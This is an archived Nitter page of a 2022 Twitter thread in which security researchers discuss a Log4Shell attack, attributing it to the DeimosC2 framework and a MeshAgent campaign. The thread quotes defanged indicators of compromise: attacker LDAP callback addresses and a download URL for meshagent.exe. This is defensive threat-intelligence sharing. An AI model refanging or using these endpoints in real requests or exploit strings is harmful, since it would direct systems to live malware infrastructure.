<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="stylesheet" type="text/css" href="/css/style.css?v=18" />
    <link rel="stylesheet" type="text/css" href="/css/fontello.css?v=2" />
    <link rel="stylesheet" type="text/css" href="/css/themes/nitter.css" />
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png" />
    <link rel="manifest" href="/site.webmanifest" />
    <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#ff6c60" />
    <link rel="search" type="application/opensearchdescription+xml" title="nitter" href="https://nitter.net/opensearch" />
    <link rel="canonical" href="https://twitter.com/ankit_anubhav/status/1490574137370103808" />
    <title>Ankit Anubhav (@ankit_anubhav): &quot;Looks like DemiosC2 (next stage payload ) based on code genes by @IntezerLabs and ESET. 

IP and some patterns looks like same folks from Iran 🇮🇷 who were running a campaign with meshagent post exploitation

https:&#x2F;&#x2F;analyze.intezer.com&#x2F;analyses&#x2F;22d0173b-2462-49ef-9d16-b2589886d926?utm_source=MalwareBazaar

cc @tolisec @CharlesDardaman  @BushidoToken&quot;|nitter</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="theme-color" content="#1F1F1F" />
    <meta property="og:type" content="photo" />
    <meta property="og:title" content="Ankit Anubhav (@ankit_anubhav)" />
    <meta property="og:description" content="Looks like DemiosC2 (next stage payload ) based on code genes by @IntezerLabs and ESET. 

IP and some patterns looks like same folks from Iran 🇮🇷 who were running a campaign with meshagent post exploitation

https://analyze.intezer.com/analyses/22d0173b-2462-49ef-9d16-b2589886d926?utm_source=MalwareBazaar

cc @tolisec @CharlesDardaman  @BushidoToken" />
    <meta property="og:site_name" content="Nitter" />
    <meta property="og:locale" content="en_US" />
    <link rel="preload" type="image/png" href="/pic/media%2FFK-VOjkVIAESNCj.jpg%3Fname%3Dsmall" as="image" />
    <meta property="og:image" content="https://nitter.net/pic/media%2FFK-VOjkVIAESNCj.jpg" />
    <meta property="twitter:image:src" content="https://nitter.net/pic/media%2FFK-VOjkVIAESNCj.jpg" />
    <meta property="twitter:card" content="summary_large_image" />
    <link rel="preload" type="font/woff2" as="font" href="/fonts/fontello.woff2?21002321" crossorigin="anonymous" />
  </head>
  <body>
    <nav><div class="inner-nav">
        <div class="nav-item"><a class="site-name" href="/">nitter</a></div>
        <a href="/"><img class="site-logo" src="/logo.png" alt="Logo" /></a>
        <div class="nav-item right">
          <div class="icon-container"><a class="icon-search" title="Search" href="/search"></a></div>
          <div class="icon-container"><a class="icon-bird" title="Open in Twitter" href="https://twitter.com/ankit_anubhav/status/1490574137370103808"></a></div>
          <a href="https://liberapay.com/zedeus"><svg class="lp" viewBox="0 0 40.6 52.3">
  <g transform="matrix(0.83,0,0,0.83,-158,-261)">
    <path d="m202.5,366c-3.1 0-5.5-0.4-7.3-1.2-1.8-0.8-3-1.9-3.8-3.3-0.8-1.4-1.1-3-1.1-4.8 0-1.8 0.3-3.7 0.8-5.8l8.3-34.8 10.2-1.6-9.1 37.8c-0.2 0.8-0.3 1.5-0.3 2.2 0 0.7 0.1 1.2 0.4 1.7 0.3 0.5 0.7 0.9 1.3 1.2 0.6 0.3 1.5 0.5 2.7 0.6l-2 8.1"/>
    <path d="m239.2 344.3c0 3.2-0.5 6.1-1.6 8.8-1 2.6-2.5 4.9-4.4 6.9-1.9 1.9-4.1 3.4-6.7 4.5-2.6 1.1-5.4 1.6-8.5 1.6-1.5 0-3-0.1-4.5-0.4l-3 11.9h-9.7l10.9-45.4c1.7-0.5 3.7-1 6-1.4 2.3-0.4 4.7-0.6 7.3-0.6 2.4 0 4.6 0.4 6.3 1.1 1.8 0.7 3.2 1.8 4.4 3 1.1 1.3 2 2.8 2.5 4.5 0.5 1.7 0.8 3.6 0.8 5.5m-23.8 13.4c0.7 0.2 1.7 0.3 2.8 0.3 1.7 0 3.3-0.3 4.7-1 1.4-0.6 2.6-1.5 3.6-2.7 1-1.1 1.7-2.5 2.3-4.1 0.5-1.6 0.8-3.4 0.8-5.3 0-1.9-0.4-3.5-1.2-4.8-0.8-1.3-2.3-2-4.3-2-1.4 0-2.7 0.1-3.9 0.4l-4.6 19.1"/>
  </g>
</svg>
</a>
          <div class="icon-container"><a class="icon-info" title="About" href="/about"></a></div>
          <div class="icon-container"><a class="icon-cog" title="Preferences" href="/settings?referer=%2Fankit_anubhav%2Fstatus%2F1490574137370103808%23m"></a></div>
        </div>
      </div></nav>
    <div class="container"><div class="conversation">
        <div class="main-thread">
          <div class="before-tweet thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/VessOnSecurity/status/1489648199530860545#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1489648199530860545#m" title="Feb 4, 2022 · 5:13 PM UTC">Feb 4</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Caught a <a href="/search?q=%23log4shell">#log4shell</a> attack delivering something I hadn't seen before - some kind of web proxy. Still live at

ldap[:]//185.8.172.132:1389/a</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 2</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 12</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item ">
              <a class="tweet-link" href="/VessOnSecurity/status/1489650023709265934#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1489650023709265934#m" title="Feb 4, 2022 · 5:20 PM UTC">Feb 4</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Only McAfee detects, only the Java class file (not the script it downloads) and only as "Java downloader", which isn't terribly helpful.

The install script suggests some legit tool (web proxy) but is used for nefarious purposes (installing it on other people's machines).</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div>
          </div>
          <div id="m" class="main-tweet"><div class="timeline-item "><div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/ankit_anubhav"><img class="avatar round" src="/pic/profile_images%2F846398147303661568%2FUTNwLJ1C_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/ankit_anubhav" title="Ankit Anubhav">Ankit Anubhav</a>
                        <a class="username" href="/ankit_anubhav" title="@ankit_anubhav">@ankit_anubhav</a>
                      </div>
                      <span class="tweet-date"><a href="/ankit_anubhav/status/1490574137370103808#m" title="Feb 7, 2022 · 6:32 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/VessOnSecurity">@VessOnSecurity</a></div>
                <div class="tweet-content media-body" dir="auto">Looks like DemiosC2 (next stage payload ) based on code genes by <a href="/IntezerLabs" title="Intezer">@IntezerLabs</a> and ESET. 

IP and some patterns looks like same folks from Iran 🇮🇷 who were running a campaign with meshagent post exploitation

<a href="https://analyze.intezer.com/analyses/22d0173b-2462-49ef-9d16-b2589886d926?utm_source=MalwareBazaar">analyze.intezer.com/analyses…</a>

cc <a href="/tolisec" title="Toli">@tolisec</a> <a href="/CharlesDardaman" title="Chase Dardaman">@CharlesDardaman</a>  <a href="/BushidoToken" title="Will">@BushidoToken</a></div>
                <div class="attachments"><div class="gallery-row" style=""><div class="attachment image"><a class="still-image" href="/pic/orig/media%2FFK-VOjkVIAESNCj.jpg" target="_blank"><img src="/pic/media%2FFK-VOjkVIAESNCj.jpg%3Fname%3Dsmall" alt="" /></a></div></div></div>
                <p class="tweet-published">Feb 7, 2022 · 6:32 AM UTC · Twitter Web App</p>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 2</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 5</div></span>
                </div>
              </div></div></div>
        </div>
        <div id="r" class="replies">
          <div class="reply thread thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/ankit_anubhav/status/1490576260136800259#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/ankit_anubhav"><img class="avatar round" src="/pic/profile_images%2F846398147303661568%2FUTNwLJ1C_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/ankit_anubhav" title="Ankit Anubhav">Ankit Anubhav</a>
                        <a class="username" href="/ankit_anubhav" title="@ankit_anubhav">@ankit_anubhav</a>
                      </div>
                      <span class="tweet-date"><a href="/ankit_anubhav/status/1490576260136800259#m" title="Feb 7, 2022 · 6:40 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/VessOnSecurity">@VessOnSecurity</a> <a href="/IntezerLabs">@IntezerLabs</a> <a href="/tolisec">@tolisec</a> <a href="/CharlesDardaman">@CharlesDardaman</a> <a href="/BushidoToken">@BushidoToken</a></div>
                <div class="tweet-content media-body" dir="auto">* DeimosC2
<a href="https://github.com/DeimosC2/DeimosC2#:~:text=DeimosC2%20is%20a%20post%2Dexploitation,front%20end%20written%20in%20Vue">github.com/DeimosC2/DeimosC2…</a>.</div>
                <div class="card large"><a class="card-container" href="https://github.com/DeimosC2/DeimosC2#:~:text=DeimosC2%20is%20a%20post%2Dexploitation,front%20end%20written%20in%20Vue">
                    <div class="card-image-container"><div class="card-image"><img src="/pic/card_img%2F1558079704086855681%2FCePtHJK1%3Fformat%3Dpng%26name%3D800x320_1" alt="" /></div></div>
                    <div class="card-content-container"><div class="card-content">
                        <h2 class="card-title">GitHub - DeimosC2&#x2F;DeimosC2: DeimosC2 is a Golang command and control framework for post-exploitat...</h2>
                        <p class="card-description">DeimosC2 is a Golang command and control framework for post-exploitation. - GitHub - DeimosC2&#x2F;DeimosC2: DeimosC2 is a Golang command and control framework for post-exploitation.</p>
                        <span class="card-destination">github.com</span>
                      </div></div>
                  </a></div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item thread-last ">
              <a class="tweet-link" href="/VessOnSecurity/status/1490578659622674432#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1490578659622674432#m" title="Feb 7, 2022 · 6:50 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Thanks.</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
          </div>
          <div class="reply thread thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/tolisec/status/1490611086177013760#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/tolisec"><img class="avatar round" src="/pic/profile_images%2F1269377768313303040%2FgAV1Y9r__bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/tolisec" title="Toli">Toli</a>
                        <a class="username" href="/tolisec" title="@tolisec">@tolisec</a>
                      </div>
                      <span class="tweet-date"><a href="/tolisec/status/1490611086177013760#m" title="Feb 7, 2022 · 8:59 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/VessOnSecurity">@VessOnSecurity</a> <a href="/IntezerLabs">@IntezerLabs</a> <a href="/CharlesDardaman">@CharlesDardaman</a> <a href="/BushidoToken">@BushidoToken</a></div>
                <div class="tweet-content media-body" dir="auto">Seems related to an attack I captured earlier, uses ‘/a’ class name and MeshAgent:</div>
                <div class="quote quote-big">
                  <a class="quote-link" href="/tolisec/status/1486385955099582472#m"></a>
                  <div class="tweet-name-row">
                    <div class="fullname-and-username">
                      <img class="avatar round mini" src="/pic/profile_images%2F1269377768313303040%2FgAV1Y9r__mini.jpg" />
                      <a class="fullname" href="/tolisec" title="Toli">Toli</a>
                      <a class="username" href="/tolisec" title="@tolisec">@tolisec</a>
                    </div>
                    <span class="tweet-date"><a href="/tolisec/status/1486385955099582472#m" title="Jan 26, 2022 · 5:10 PM UTC">Jan 26</a></span>
                  </div>
                  <div class="quote-text" dir="auto"><a href="/search?q=%23log4j">#log4j</a> <a href="/search?q=%23malware">#malware</a> MeshAgent
IoCs: 
ldap://45[.]12[.]32.14:1389/a
hxxp://45.12[.]32[.]14:8080/meshagent.exe
connects to 45.12.32.61
bazaar: <a href="https://bazaar.abuse.ch/sample/8350a3a65abbc7a2ecb5c8d997341289370d26d1f6ad65e9bd99f04c806baa89/">bazaar.abuse.ch/sample/8350a…</a>  
Sandbox Analysis: <a href="http://any.run">any.run</a> <a href="https://app.any.run/tasks/6c6d25db-40fa-4080-a5e2-a05f44eba16c/">app.any.run/tasks/6c6d25db-4…</a></div>
                  <div class="quote-media-container"><div class="attachments"><div class="gallery-row" style=""><div class="attachment image"><a class="still-image" href="/pic/orig/media%2FFKCz5lEXwAEiUpn.jpg" target="_blank"><img src="/pic/media%2FFKCz5lEXwAEiUpn.jpg%3Fname%3Dsmall" alt="" /></a></div></div></div></div>
                </div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 5</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item thread-last ">
              <a class="tweet-link" href="/VessOnSecurity/status/1490634174256013317#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/VessOnSecurity"><img class="avatar round" src="/pic/profile_images%2F684776303329935360%2F7HnClXW4_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/VessOnSecurity" title="Vess">Vess</a>
                        <a class="username" href="/VessOnSecurity" title="@VessOnSecurity">@VessOnSecurity</a>
                      </div>
                      <span class="tweet-date"><a href="/VessOnSecurity/status/1490634174256013317#m" title="Feb 7, 2022 · 10:30 AM UTC">Feb 7</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto">Maybe but not the same. The Java exploit downloads and runs a bash script, which does contain several references to "mesh" but seems legit (error messages, uninstall command, progress messages).</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="top-ref"><div class="icon-container"><a class="icon-down" title="" href="#m"></a></div></div>
      </div></div>
  </body>
</html>